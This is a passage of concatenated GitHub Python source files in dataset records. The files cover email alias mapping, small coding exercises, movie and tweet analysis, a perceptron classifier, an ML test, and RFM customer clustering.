Es.query_relations(_with=list(non_mailman_groups),\n _from=dt_now, until=dt_now, how=None):\n e = non_mailman_groups[rel['with']]\n email = id2email.get(rel['who'])\n if email is not None:\n tbl.map[e.canonical_email].values.append(email)\n return tbl\n\n\ndef generate_postfix_slm_map():\n # We generate the postfix \"sender_login_maps\".\n # This is used to decide by postfix whether a given user is allowed to\n # send e-mail as if it was coming from a particular e-mail address.\n # It is a dictionary { : [ , ... ] }\n tbl = dict()\n dt_now = now()\n # Get all users\n ulut = dict()\n # We only allow members to send e-mail\n for u in Es.by_name('leden').get_members():\n ulut[u._id] = u\n for name in u.names:\n if str(name) not in tbl:\n tbl[str(name)] = set()\n tbl[str(name)].add(str(u.name))\n # There are two kind of groups: groups whose members are allowed to\n # send e-mail as if coming from the group itself and those where this\n # is not allowed. For convenience, lets call the first kind the\n # impersonatable groups.\n # Get all impersonatable groups and create a look-up-table for\n # group membership\n gs = list()\n for g in Es.groups():\n # TODO add a tag to force a group either impersonatable or not\n if not g.got_mailman_list:\n gs.append(g)\n mrels = Es.query_relations(how=None, _with=gs, _from=dt_now, until=dt_now)\n mlut = dict()\n for g in gs:\n mlut[g._id] = []\n for mrel in mrels:\n mlut[mrel['with']].append(mrel['who'])\n # Flatten out group membership. For instance: if Giedo is in Kasco\n # and Kasco is in Boekenlezers, then Giedo is also in the Boekenlezers\n # unix group.\n # But first split the mlut graph into a impersonatable group\n # and a non-group subgraph.\n mlut_g = {} # { : }\n mlut_u = {} # { : }\n for g_id in mlut:\n mlut_g[g_id] = [c for c in mlut[g_id] if c in mlut]\n mlut_u[g_id] = [c for c in mlut[g_id] if c in ulut]\n mlut_g_tc = tc(mlut_g) # transitive closure\n for g in gs:\n to_consider = tuple(mlut_g_tc[g._id]) + (g._id,)\n for sg_id in to_consider:\n for u_id in mlut_u[sg_id]:\n for name in g.names:\n if str(name) not in tbl:\n tbl[str(name)] = set()\n tbl[str(name)].add(str(ulut[u_id].name))\n # Clean up tbl to return.\n ret = daan_pb2.PostfixMap()\n for name, users in six.iteritems(tbl):\n if not users:\n continue\n ret.map[\"%s@%s\" % (name, settings.MAILDOMAIN)].values.extend(users)\n return ret\n\n# vim: et:sta:bs=2:sw=4:\n","repo_name":"karpenoktem/kninfra","sub_path":"kn/utils/giedo/postfix.py","file_name":"postfix.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"30574796433","text":"import math\n\nx1, y1 = input().split(\" \")\nx2, y2 = input().split(\" \")\nx1 = float(x1)\nx2 = float(x2)\ny1 = float(y1)\ny2 = float(y2)\n\nd = (x2 - x1)**2 + (y2 - y1)**2\n\nprint(\"{:.4f}\".format(math.sqrt(d))) ","repo_name":"develis/uri-python","sub_path":"1015 - Distância Entre Dois Pontos.py","file_name":"1015 - Distância Entre Dois Pontos.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4336651528","text":"import pandas as pd\nimport csv\nimport ast\nimport collections\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\nimport matplotlib.pyplot as plt\nfrom collections import Counter\n\n\ndf = pd.read_csv('Search.csv')\n\ndef commonWordsList(column):\n \"\"\"\n Given a column, this method turns it into a list and then flattens the list\\\n of lists (since the entries are also lists), and then returns the top 4\\\n most common entries (with the number of instances) as a tuple.\n\n Parameter column: Column of a DataFrame to be analyzed\n Precondition: column of a DataFrame\n Example: \"Keywords\"\n \"\"\"\n l = df[column].tolist()\n list = [inner for item in l for inner in ast.literal_eval(item)] #flatten the list\n counter = collections.Counter(list)\n return(counter.most_common()[:4])\n\ndef commonWords(column, c2 = [], c3 = []):\n \"\"\"\n Given a column(s) (that is practically a 1D list without any nested lists),\\\n this method turns it into a list, and then returns the top 4 most common \\\n entries. If more there is more than 1 column provided, it turns all given \\\n columns into lists, joins them to create a single bigger list, and then \\\n returns the top 4 most common entries (with the number of instances) as a \\\n tuple\n\n Parameter column: Column of a DataFrame to be analyzed\n Paramater c2: Column of a DataFrame to be analyzed\n Parameter c3: Column of a DataFrame to be analyzed\n Precondition (for all parameters): column of a DataFrame\n Example: \"Director, Lead_Actor\"\n \"\"\"\n l1 = df[column].tolist()\n l = l1\n if (c2 != [] and c3 != []):\n l2 = df[c2].tolist()\n l3 = df[c3].tolist()\n l = l1 + l2 + l3\n counter = collections.Counter(l)\n return(counter.most_common()[:4])\n\ndef makePlot(column):\n d = df.groupby(\"Director\")\n plt.figure(figsize=(12,8))\n d.size().sort_values(ascending=False).plot.bar()\n plt.xticks(rotation=50)\n plt.xlabel(\"Name of Director\")\n plt.ylabel(\"Number of Liked Movies\")\n plt.savefig(\"myPlot\"+\".png\", bbox_inches='tight')\n plt.show()\n plt.close()\n\ndef makeWordCloud(column):\n list = df[column].tolist()\n my_list = [inner for item in list for inner in ast.literal_eval(item)]\n word_could_dict=Counter(my_list)\n wordcloud = WordCloud(width = 1000, height = 500).generate_from_frequencies\\\n (word_could_dict)\n\n plt.figure(figsize=(15,8))\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.savefig(\"myWorldCloud\"+\".png\", bbox_inches='tight')\n plt.show()\n plt.close()\n\nmeanBudget = df[\"Budget\"].mean()\nmeanDuration = df[\"Duration\"].mean()\nmeanRating = df[\"IMDb_Rating\"].mean()\nmeanRevenue = df[\"Revenue\"].mean()\ntopGenres = commonWordsList(\"Genres\")\ntopKeywords = commonWordsList(\"Keywords\")\ntopDirectors = commonWords(\"Director\")\ntopActors = commonWords(\"Lead_Actor\", \"Supporting_Actor_1\", \"Supporting_Actor_2\")\nmakeWordCloud(\"Keywords\")\nmakePlot(\"Genres\")\n","repo_name":"keethu-ram/Movie-Analysis","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"10844614264","text":"import sys\ninput = sys.stdin.readline\nn, m = map(int, input().rstrip().split())\ndatas = list(map(int, input().rstrip().split()))\ndatas.sort()\ndef backtracking(start, to, l, nums, m):\n if len(l) == m:\n print(*l)\n return\n for i in range(start, to):\n l.append(nums[i])\n backtracking(i, to, l, nums, m)\n l.pop()\nbacktracking(0, n, [], datas, m)","repo_name":"K1A2/algorithm_python","sub_path":"baekjoon/backtracking/15657_N과M_8.py","file_name":"15657_N과M_8.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71455298612","text":"# CHAPTER FOUR TRY IT YOURSELF\n\n# 4-6 Odd Numbers\n# Use the third argument of the range() function to make a list of\n# the odd numbers from 1 to 20. Use a 'for' loop to print each\n# number.\n\noddnumbers = list(range(1, 21, 2))\n\nfor oddnumber in oddnumbers:\n\tprint(oddnumber)\n\n# Can you do a list comprehension there?\n\n","repo_name":"ctrlshftejct/pythoncc","sub_path":"2019/chapter4/tiy_oddnumbers.py","file_name":"tiy_oddnumbers.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6402574390","text":"#!/usr/bin/python3\n\n# Deletes all of the Transplanting logs and possibly the Planting assets.\n\n# Most transplantings rely on existing Plantings from traySeedings\n# By default those Plantings are not deleted. \n# This allows the addTransplantings.py script to be run again.\n# However, plantings created for directly transplanted crops that arrived in trays\n# will be deleted by default, because they are recreated by the addTransplantings.py script.\n\n# Addng the command line argument \"all\" will cause this script to also \n# delete the preexisting Planting assets from the traySeedings.\n\nfrom utils import *\n\ndef main():\n\n print(\"Deleting Transplantings...\")\n\n delAllPlantings = False\n if (len(sys.argv) == 2 and sys.argv[1] == 'all'):\n print(\" Deleting all Plantings\")\n delAllPlantings = True\n\n # Delete any transplantings that exist.\n deleteAllLogs('http://localhost/log.json?type=farm_transplanting')\n\n # Delete all of the Plantings created specifically for transplantings\n deleteAllAssets('http://localhost/farm_asset.json?type=planting&name[sw]=0000-00-00')\n\n if delAllPlantings:\n deleteAllAssets('http://localhost/farm_asset.json?type=planting')\n\n # Delete the transplanting category that was added.\n deleteSeedingCategory(\"Transplantings\")\n\n print(\"Transplantings deleted.\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"cmacdonell/GitKit-FarmData2","sub_path":"docker/sampleDB/deleteTransplantings.py","file_name":"deleteTransplantings.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41239508077","text":"from django.conf import settings\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom elasticsearch import Elasticsearch, RequestsHttpConnection\nfrom multiprocessing import Process\nfrom requests_aws4auth import AWS4Auth\nimport json\nimport math\nimport tweepy\n\nconsumer_key = ''\nconsumer_secret = ''\naccess_token = ''\naccess_token_secret = ''\n\naws_access_key_id = ''\naws_secret_access_key = ''\nregion = 'us-east-2'\n\nhost = ''\nawsauth = AWS4Auth(aws_access_key_id, aws_secret_access_key, region, 'es')\n\nes = Elasticsearch(\n\thosts=[{'host': host, 'port': 443}],\n\thttp_auth=awsauth,\n\tuse_ssl=True,\n\tverify_certs=True,\n\tconnection_class=RequestsHttpConnection\n)\n\ntweets = []\ntrends = []\n\nclass StreamListener(tweepy.StreamListener):\n\t\n\tdef __init__(self, api):\n\t\tself.api = api\n\t\tsuper(tweepy.StreamListener, self).__init__()\n\t\tself.count = settings.COUNT\n\n\tdef on_data(self, tweet):\n\t\t# while True:\n\t\twhile self.count<=1000:\n\t\t\tres = es.index(index=\"tweet-index\", doc_type='tweet', id=self.count, body=tweet)\n\t\t\tself.count+=1\n\t\t\treturn True\n\n\tdef on_error(self, status_code):\n\t\tprint(\"status_code = \",status_code)\n\t\tif status_code == 420:\n\t\t\treturn False\n\ndef ajax_process(request):\n\tif settings.COUNT<=100000:\n\t\tfor i in range(settings.COUNT, settings.COUNT+100):\n\t\t\tres = es.get(index=\"tweet-index\", doc_type='tweet', id=i)\n\t\t\ttweets.append(res['_source'])\n\t\tsettings.COUNT+=100\n\t\t\n\t\tlanguages = []\n\t\tlatitude = []\n\t\tlongitude = []\n\t\ttweet_id = []\n\t\ttweet_text = []\n\t\tuser_profile_image_url = []\n\t\tuser_screen_name = []\n\t\t\n\t\tlanguages, latitude, longitude, tweet_id, tweet_text, user_profile_image_url, user_screen_name = process_tweets(tweets)\n\t\t\n\t\treturn JsonResponse({\"tweet_data\" : tweets, \"latitude\": latitude, \"longitude\": longitude, \"languages\": languages,\n\t\t\t\"user_profile_image_url\": user_profile_image_url, \"user_screen_name\": user_screen_name, \"tweet_id\": tweet_id, \"tweet_text\": tweet_text})\n\telse:\n\t\treturn JsonResponse({})\n\ndef index(request):\n\tif settings.FLAG==0:\n\t\tsettings.FLAG = 1\n\t\tp1 = Process(target = twitter_stream)\n\t\tp1.start()\t\n\treturn render(request, 'TweetMap/index.html', {})\n\ndef process_tweets(tweet_list):\n\tlanguages = []\n\tlatitude = []\n\tlongitude = []\n\ttweet_id = []\n\ttweet_text = []\n\tuser_profile_image_url = []\n\tuser_screen_name = []\n\t\n\tlanguages = list(map(lambda tweet: tweet['lang'] if 'lang' in tweet\n\t\t\t\t\t\tand tweet['lang'] != None else 'NaN', tweet_list))\n\n\ttweet_id = list(map(lambda tweet: tweet['id'] if 'id' in tweet\n\t\t\t\t\t\telse 'NaN', tweet_list))\n\t\n\ttweet_text = list(map(lambda tweet: tweet['text'] if 'text' in tweet\n\t\t\t\t\t\telse 'NaN', tweet_list))\n\n\tuser_profile_image_url = list(map(lambda tweet: tweet['user']['profile_image_url_https'] if 'user' in tweet\n\t\t\t\t\t\telse 'NaN', tweet_list))\n\t\n\tuser_screen_name = list(map(lambda tweet: tweet['user']['screen_name'] if 'user' in tweet\n\t\t\t\t\t\telse 'NaN', tweet_list))\n\t\n\tlatitude = list(map(lambda tweet: tweet['coordinates']['coordinates'][1]\n\t\t\t\t\t\tif 'coordinates' in tweet and tweet['coordinates'] != None\n\t\t\t\t\t\telse float(float(tweet['place']['bounding_box']['coordinates'][0][1][1]\n\t\t\t\t\t\t\t\t\t+ tweet['place']['bounding_box']['coordinates'][0][3][1])/2)\n\t\t\t\t\t\tif 'place' in tweet and tweet['place']!=None \n\t\t\t\t\t\telse 'NaN', tweet_list))\n\n\tlongitude = list(map(lambda tweet: tweet['coordinates']['coordinates'][0]\n\t\t\t\t\t\tif 'coordinates' in tweet and tweet['coordinates'] != None \n\t\t\t\t\t\telse float(float(tweet['place']['bounding_box']['coordinates'][0][1][0]\n\t\t\t\t\t\t\t\t\t+ tweet['place']['bounding_box']['coordinates'][0][3][0])/2)\n\t\t\t\t\t\tif 'place' in tweet and tweet['place']!=None else 'NaN', tweet_list))\n\n\tlongitude = list(map(float, longitude))\n\tlongitude = [999 if math.isnan(i) else i for i in longitude]\n\tlatitude = list(map(float, latitude))\n\tlatitude = [999 if math.isnan(i) else i for i in latitude]\n\n\treturn languages, latitude, longitude, tweet_id, tweet_text, user_profile_image_url, user_screen_name\n\ndef search_query(request):\n\tsearch_results = []\n\tif request.method == \"POST\":\n\t\tsearch_term = request.POST.get('search_bar')\n\t\tdropdown_option = 0\n\t\tis_dropdown_search = request.POST.get('is_dropdown_search')\n\t\tdropdown_dict = {'cat':1,'dog':2,'cricket':3,'football':4,'modi':5,'trump':6,'song':7,'vacation':8,'offer':9,'sale':10}\n\t\t\n\t\tif is_dropdown_search==\"1\":\n\t\t\tdropdown_option = dropdown_dict.get(search_term)\n\t\t\n\t\tquery = json.dumps({\n\t\t\t\"query\": {\n\t\t\t\t\"match\": {\n\t\t\t\t\t\"text\": search_term\n\t\t\t\t}\n\t\t\t}\n\t\t})\n\t\tres = es.search(index=\"tweet-index\", body=query)\n\t\tfor hit in res['hits']['hits']:\n\t\t\tsearch_results.append(hit[\"_source\"])\n\t\t\n\t\tlanguages = []\n\t\tlatitude = []\n\t\tlongitude = []\n\t\ttweet_id = []\n\t\ttweet_text = []\n\t\tuser_profile_image_url = []\n\t\tuser_screen_name = []\n\n\t\tif len(search_results)>0:\n\t\t\tlanguages, latitude, longitude, tweet_id, tweet_text, user_profile_image_url, user_screen_name = process_tweets(search_results)\n\n\treturn render(request, 'TweetMap/results.html',\n\t\t{'latitude': latitude, 'longitude': longitude,'languages': languages, 'dropdown_option':dropdown_option,\n\t\t'user_profile_image_url': user_profile_image_url, 'user_screen_name': user_screen_name, 'tweet_id': tweet_id, 'tweet_text': tweet_text})\n\ndef twitter_stream():\n\tauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n\tauth.set_access_token(access_token, access_token_secret)\n\tapi = tweepy.API(auth)\n\ttrends = api.trends_place(1)\n\t# for location in trends:\n\t# \tfor trend in location[\"trends\"]:\n\t\t\t# trends.append(trend[\"name\"])\n\t\t\t# print(trend[\"name\"])\n\tstream_listener = StreamListener(api)\n\tstream = tweepy.Stream(auth=api.auth, listener=stream_listener)\n\tstream.filter(locations=[-180,-90,180,90])\n","repo_name":"tronak19/TweetMap","sub_path":"ebdjango/TweetMap/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13588344402","text":"import sys\nimport os\n\nsys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), \"..\"))\nimport pytest\nfrom itertools import product\n\nimport torch\nfrom lib.modules.classification.classification.multiple_instance_learning import (\n MultipleInstanceClassifier,\n get_adn_fn,\n)\n\nbatch_size = 4\ninput_dim = 1\ninput_dim_mil = 32\nclassification_structure = [32, 16]\nfeat_extraction_structure = [32, 16]\nn_slices = 8\nn_classes = 2\nadn_fn = get_adn_fn(1, \"identity\", \"gelu\", 0.1)\n\n\n@pytest.mark.parametrize(\n \"classification_mode,attention\",\n product([\"mean\", \"max\", \"vocabulary\"], [True, False]),\n)\ndef test_mil(classification_mode, attention):\n mod = MultipleInstanceClassifier(\n module=torch.nn.Conv2d(input_dim, input_dim_mil, 3),\n module_out_dim=input_dim_mil,\n n_classes=n_classes,\n feat_extraction_structure=feat_extraction_structure,\n classification_structure=classification_structure,\n classification_mode=classification_mode,\n classification_adn_fn=adn_fn,\n n_slices=n_slices,\n use_positional_embedding=False,\n attention=attention,\n dim=2,\n )\n input_tensor = torch.rand(batch_size, input_dim, 32, 32, n_slices)\n output = mod(input_tensor)\n assert list(output.shape) == [\n batch_size,\n 1 if n_classes == 2 else n_classes,\n ]\n","repo_name":"CCIG-Champalimaud/adell-mri","sub_path":"testing/test_mil.py","file_name":"test_mil.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"11362554925","text":"import numpy as np\n\n\nclass Perceptron:\n def __init__(self, n_class: int, lr: float, epochs: int):\n \"\"\"Initialize a new classifier.\n\n Parameters:\n n_class: the number of classes\n lr: the learning rate\n epochs: the number of epochs to train for\n \"\"\"\n self.w = None\n self.lr = lr\n self.epochs = epochs\n self.n_class = n_class\n\n def train(self, X_train: np.ndarray, y_train: np.ndarray):\n \"\"\"Train the classifier.\n\n Use the perceptron update rule as introduced in the Lecture.\n\n Parameters:\n X_train: a number array of shape (N, D) containing training data;\n N examples with D dimensions\n y_train: a numpy array of shape (N,) containing training labels\n \"\"\"\n N, D = X_train.shape\n\n #self.w = np.random.rand(self.n_class,D) # create a weight matrix of shape (1,D)\n self.w = np.zeros((self.n_class,D))\n #print(self.w)\n #print(self.w.shape)\n #print(y_train[0:20])\n for iter in range(self.epochs):\n #if iter > 5:\n # self.lr = 0.5\n for example_num in range(N):\n x = X_train[example_num]\n y_label = y_train[example_num]\n y_hat_list = np.dot(self.w, x) # get the dot product of weight and feature\n #print(y_label,y_hat_list)\n y_hat_max = np.argmax(y_hat_list)\n\n if y_label == y_hat_max:\n pass\n else: # update weight\n y_yi = y_hat_list[y_label] # correct label w^T_yi*xi\n #y_c = np.argwhere(y_hat_list > y_yi).reshape(1,-1) # all labels higher than y_yi\n\n coef_x = (self.lr)*x\n\n for class_num in range(self.n_class):\n if iter == 0:\n #if class_num == y_label:\n self.w[y_label] = self.w[y_label] + coef_x\n #else:\n self.w[class_num] = self.w[class_num] - coef_x\n\n if y_hat_list[class_num] > y_yi:\n self.w[y_label] = self.w[y_label] + coef_x\n self.w[class_num] = self.w[class_num] - coef_x\n\n def predict(self, X_test: np.ndarray) -> np.ndarray:\n \"\"\"Use the trained weights to predict labels for test data points.\n\n Parameters:\n X_test: a numpy array of shape (N, D) containing testing data;\n N examples with D dimensions\n\n Returns:\n predicted labels for the data in X_test; a 1-dimensional array of\n length N, where each element is an integer giving the predicted\n class.\n \"\"\"\n N, D = X_test.shape\n labels = np.zeros((N))\n #print(self.w.shape)\n for example_num in range(N):\n x = X_test[example_num]\n y_hat = np.dot(self.w,x)\n labels[example_num] = np.argmax(y_hat)\n\n\n return labels","repo_name":"kulbir-ahluwalia/Linear_classifiers","sub_path":"assignment1/models/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25442891954","text":"# %%\nimport tensorflow as tf\n\n\n@tf.function\ndef mse(y_actual, y_pred):\n valid = tf.cast(tf.math.reduce_max(y_actual, axis=(1, 2)) > 0, dtype=tf.float32)\n valid_mask = tf.reshape(valid, [tf.shape(y_actual)[0], 1, 1, tf.shape(valid)[-1]])\n return tf.reduce_mean(tf.square(y_actual - y_pred) * valid_mask)\n\n\n# %%\nif __name__ == \"__main__\":\n\n a = tf.constant([\n [1, 2],\n [1, 2]\n ], dtype=tf.float32)\n b = tf.math.multiply(0.5, a)\n\n\n# %%\n","repo_name":"Qlanowski/rangle","sub_path":"cost_functions.py","file_name":"cost_functions.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24622242893","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('run', '\"rfm and cust_segm..ipynb\"')\n\n\n# In[ ]:\n\n\nrfm_df_new\n\n\n# # in this , we will make clusters on RFM analysis data using K-means , unlike previous N.B in which we declared our own segments\n\n# \n\n# In[ ]:\n\n\n# we have already checked the skewness and have also applied log transformation\n# in the previous notebool\n\n\n# In[ ]:\n\n\nrfm_df_new\n\n\n# Now we create new df of required columns for KNN/\n# \n\n# In[ ]:\n\n\nrfm_df_new1 = df[[ 'cust_id', 'Recency' , 'Frequency' , 'MonetaryValue' ,'RFM_Score' ]]\nrfm_df_new1\n\n\n# In[ ]:\n\n\ngrouped_by_cust_id = rfm_df_new1.groupby('cust_id')\nmean_values_by_cust_id = grouped_by_cust_id.mean()\n\nrfm_df_new1 = mean_values_by_cust_id\n\n\n# In[ ]:\n\n\nrfm_df_new1\n\n\n# In[ ]:\n\n\n\n\n\n# before applying standard scaler , we will apply label encoding because the\n# \"cust_id\" column is of string data type in df rfm_df_new\n\n# In[ ]:\n\n\nle = LabelEncoder()\n\n\n# In[ ]:\n\n\n#Get list of categorical variables\ns = (rfm_df_new1.dtypes == 'object')\nobject_cols = list(s[s].index)\n\nprint(\"Categorical variables in the dataset:\", object_cols)\n\n\n# In[ ]:\n\n\nfor i in object_cols:\n rfm_df_new1[i]=rfm_df_new1[[i]].apply(le.fit_transform)\nprint('all features are now numerical') \n\n\n# In[ ]:\n\n\n\n\n\n# now we apply standard scaling\n\n# In[ ]:\n\n\nscaler = StandardScaler()\nscaler.fit(rfm_df_new1)\nrfm_scaled = pd.DataFrame(scaler.transform(rfm_df_new1),columns=rfm_df_new1.columns)\n\n\n# In[ ]:\n\n\nrfm_scaled\n\n\n# # K-means Clustering\n\n# In[ ]:\n\n\nwcss = []\n\nfor i in range(1,11):\n kmeans = KMeans(n_clusters=i , random_state=0)\n kmeans.fit(rfm_scaled)\n wcss.append(kmeans.inertia_)\n\n\nplt.figure(figsize=(8, 6))\nplt.plot(range(1, 11), wcss, marker='o', linestyle='--')\nplt.title('Elbow Method')\nplt.xlabel('Number of Clusters (i)')\nplt.ylabel('WCSS')\n\nplt.show()\n\n \n\n\n# In[ ]:\n\n\nkmeans= KMeans(n_clusters=4, random_state=0)\n\ny_predict = kmeans.fit_predict(rfm_scaled)\n\nrfm_scaled['clusters'] = y_predict\n\n\n\n# y_predict = kmeans.fit_predict(rfm_scaled): Fits the KMeans model to the dataset pca_ds and obtains the cluster labels for each data point. \n# \n# rfm_scaled['clusters'] = y_predict: Creates a new column named 'clusters' in the rfm_scaled DataFrame and assigns the cluster labels obtained from the KMeans model.\n# \n# rfm_scaled['clusters'] = y_predict: If there's another DataFrame named rfm_scaled, it adds a new column named 'clusters' to it and assigns the same cluster labels obtained from the KMeans model\n# \n# \n# After running this code, both rfm_scaled and df will have a new column named 'clusters' that contains the assigned cluster labels based on the KMeans clustering. Each row in these DataFrames is now associated with a cluster label indicating to which cluster the corresponding data point belongs.\n\n# In[ ]:\n\n\n#Plot the clusters\n\ncmap = matplotlib.cm.viridis\n\n\n\nx = rfm_scaled['Recency']\ny = rfm_scaled['Frequency']\nz = rfm_scaled['MonetaryValue']\n\nfig = plt.figure(figsize=(10,8))\nax = plt.subplot(111, projection='3d', label=\"bla\")\nax.scatter(x, y, z, s=40, c=rfm_scaled[\"clusters\"], marker='o', cmap = cmap )\nax.set_title(\"The Plot Of The Clusters\")\nplt.show()\n\n\n# plotting above graph using plotly.express\n\n# In[ ]:\n\n\nimport plotly.express as px\n\n#m Assuming you have the following dataframes and variables\n\nx = rfm_scaled['Recency']\ny = rfm_scaled['Frequency']\nz = rfm_scaled['MonetaryValue']\n\nclusters = rfm_scaled['clusters']\n\nfig = px.scatter_3d(rfm_scaled, x=x, y=y, z=z, color=clusters, size_max=10, opacity=0.7,\n title=\"The Plot Of The Clusters\")\nfig.show()\n\n\n# In[ ]:\n\n\nrfm_scaled\n\n\n# In[ ]:\n\n\nrfm_scaled['RFM_Score'].max()\n\n\n# In[ ]:\n\n\nrfm_scaled['RFM_Score'].min()\n\n\n# we observe that max and min values are not scaled , hence first we will normalize\n# the values so that it is easy to create segments\n\n# In[ ]:\n\n\nrfm_scaled['RFM_Score'] = (rfm_scaled['RFM_Score'] - rfm_scaled['RFM_Score'].min()) / (rfm_scaled['RFM_Score'].max() - rfm_scaled['RFM_Score'].min())\n\n# Subtract the minimum value from each element in the 'RFM_Score' column\n# Divides the result from the previous step by the range ( max-min) of the 'RFM_Score' column.\n# Finally, the normalized values are assigned back to the 'RFM_Score' \n\n\n# In[ ]:\n\n\nrfm_scaled['RFM_cust_seg'] = ''\n\nrfm_scaled.loc[rfm_scaled['RFM_Score'] >= 0.75, 'RFM_cust_seg'] = 'Champions'\nrfm_scaled.loc[(rfm_scaled['RFM_Score'] >= 0.5) & (rfm_scaled['RFM_Score'] < 0.75), 'RFM_cust_seg'] = 'Potential Loyalists'\nrfm_scaled.loc[(rfm_scaled['RFM_Score'] >= 0.25) & (rfm_scaled['RFM_Score'] < 0.5), 'RFM_cust_seg'] = 'At Risk Customers'\nrfm_scaled.loc[(rfm_scaled['RFM_Score'] >= 0) & (rfm_scaled['RFM_Score'] < 0.25), 'RFM_cust_seg'] = \"Can't Lose\"\n\n\n# In[ ]:\n\n\nrfm_scaled['RFM_cust_seg'].value_counts()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n# Get the cluster labels for each data point\ncluster_labels = kmeans.labels_\n\n# Calculate the cluster size of each cluster\ncluster_sizes = np.unique(cluster_labels, return_counts=True)[1]\n\n# Print the cluster sizes\nprint(cluster_sizes)\n\n\n# pie chart for cluster distribution\n\n# In[ ]:\n\n\nimport matplotlib.pyplot as plt\n\n# Example cluster distribution data (replace with your actual data)\ncluster_labels = ['Cluster 1', 'Cluster 2', 'Cluster 3', 'Cluster 4']\ncluster_sizes = [245,219,266,63] # Replace with the sizes of your clusters\n\n# Create a pie chart\nplt.figure(figsize=(6, 6))\nplt.pie(cluster_sizes, labels=cluster_labels, autopct='%1.1f%%', startangle=140)\nplt.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle.\n\n# Add a title\nplt.title('Cluster Distribution')\n\n# Show the pie chart\nplt.show()\n\n\n# # Summarizing my findings\n\n# In[ ]:\n\n\ndef rfm_values(rfm_sclaed):\n df_new = rfm_scaled.groupby(['clusters']).agg({\n 'Recency': 'mean',\n 'Frequency': 'mean',\n 'MonetaryValue': ['mean', 'count']\n }).round(0)\n \n return df_new\n\nrfm_values(rfm_scaled)\n\n\n# # Conclusion\n\n# # 1. Cluster 0\n\n# \n# Recency: The mean Recency value is 0.0, suggesting that customers in this cluster have made recent purchases.\n# \n# Frequency: The mean Frequency value is 1.0, indicating a high frequency of purchases. Customers in this cluster are making purchases frequently.\n# \n# MonetaryValue: The mean MonetaryValue is close to 0.0, suggesting moderate spending. Customers in this cluster are spending at a moderate level.\n# \n# Count: This cluster has a count of 245, indicating a significant number of customers.\n\n# # 2. Cluster 1\n\n# \n# Recency: The mean Recency value is 1.0, indicating that customers in this cluster have not made recent purchases.\n# \n# Frequency: The mean Frequency value is -1.0, suggesting low frequency or no recent purchases. Customers in this cluster are not making purchases frequently.\n# \n# MonetaryValue: The mean MonetaryValue is close to 0.0, indicating average spending. Customers in this cluster are spending at an average level.\n# \n# Count: This cluster has a count of 219, suggesting a notable number of customers.\n\n# # 3. Cluster 2\n\n# \n# Recency: The mean Recency value is close to 0.0, suggesting that customers in this cluster have made recent purchases.\n# \n# Frequency: The mean Frequency value is -1.0, suggesting low frequency or no recent purchases. Customers in this cluster are not making purchases frequently.\n# \n# MonetaryValue: The mean MonetaryValue is close to 0.0, suggesting moderate spending. Customers in this cluster are spending at a moderate level.\n# \n# Count: This cluster has the highest count, with 266 customers, indicating it is the largest segment.\n\n# # 4. Cluster 3\n\n# \n# Recency: The mean Recency value is close to 0.0, suggesting recent activity.\n# \n# Frequency: The mean Frequency value is 2.0, indicating a very high frequency of purchases. Customers in this cluster are making purchases very frequently.\n# \n# MonetaryValue: The mean MonetaryValue is 2.0, suggesting high spending. Customers in this cluster are high spenders.\n# \n# Count: This cluster has a count of 63, indicating the smallest group of customers.\n\n# # in summary\n\n# Cluster 0 represents customers who are recent and moderate spenders but make purchases frequently.\n# \n# Cluster 1 represents customers who have not made recent purchases and have average spending.\n# \n# Cluster 2 represents a large group of customers who are recent and moderate spenders but do not make purchases frequently.\n# \n# Cluster 3 represents a small group of high-frequency, high-spending customers with recent activity.\n# \n\n# In[ ]:\n\n\n\n\n","repo_name":"chakshat27/RFM-Analysis","sub_path":"RFM &Customer Seg.(using k_means clustering).py","file_name":"RFM &Customer Seg.(using k_means clustering).py","file_ext":"py","file_size_in_byte":8518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73233700534","text":"import json\nfrom django.http import HttpResponse\nfrom django_swagger_utils.drf_server.utils.decorator.interface_decorator \\\n import validate_decorator\nfrom .validator_class import ValidatorClass\nfrom content_management_portal.interactors.create_test_case_interactor import\\\n CreateTestCaseInteractor\nfrom content_management_portal.storages.test_case_storage_implementation \\\n import TestCaseStorageImplementation\nfrom content_management_portal.storages.question_storage_implementation \\\n import QuestionStorageImplementation\nfrom content_management_portal.presenters.presenter_implementation import\\\n PresenterImplementation\n\n\n\n@validate_decorator(validator_class=ValidatorClass)\ndef api_wrapper(*args, **kwargs):\n test_case_details = 